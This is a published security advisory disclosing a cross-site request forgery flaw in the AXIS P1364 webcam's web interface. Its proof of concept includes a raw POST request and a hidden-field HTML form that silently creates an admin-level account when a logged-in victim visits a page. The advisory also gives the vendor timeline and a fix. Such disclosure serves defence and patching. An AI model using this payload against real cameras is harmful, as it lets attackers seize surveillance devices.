usd-2023-0007 | AXIS P1364 - Webcam - Cross-Site Request Forgery (CSRF)

Advisory ID: usd-2023-0007
Product: AXIS P1364 - Webcam
Affected Version: AXIS OS 9.80.12
Vulnerability Type: Cross-Site Request Forgery (CSRF) (CWE-352)
Security Risk: High
Vendor URL:
Vendor acknowledged vulnerability: No, CSRF vulnerabilities are out of scope according to their vulnerability management policy
Vendor Status: Not fixed
CVE number: Not requested yet
CVE Link: Not requested yet


A CSRF vulnerability in the web interface of the AXIS P1364 allows an attacker to create a new admin account.

Proof of Concept

The application fails to protect critical actions against CSRF attacks.
The following request creates a new user in the AXIS camera and does not contain protection mechanisms against CSRF.

POST /axis-cgi/pwdgrp.cgi HTTP/1.1
Content-Length: 97
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: []()
Connection: close
Authorization: Digest username="root", realm="AX[...]

The following HTML creates a malicious website, which creates a new admin account once visited by the victim.

  <script>history.pushState('', '', '/')</script>
    <form action="[https://[REDACTED]/axis-cgi/pwdgrp.cgi"]() method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="user" value="pentestcsrf" />
      <input type="hidden" name="pwd" value="changeme1234!" />
      <input type="hidden" name="grp" value="users" />
      <input type="hidden" name="strict_pwd" value="1" />
      <input type="hidden" name="sgrp" value="viewer:operator:admin&#58>
      <input type="submit" value="Submit request" />


Implement unique CSRF tokens for state-changing requests.



  • 2023-03-08: First attempt to contact the vendor via e-mail.
  • 2023-03-22: Second second attempt to contact the vendor via e-mail.
  • 2023-06-05: The vendor replies that CSRF vulnerabilities are out of scope according to their vulnerability management policy.
  • 2024-06-27: This advisory is published.


This security vulnerability was identified by Christian Pöschl of usd AG.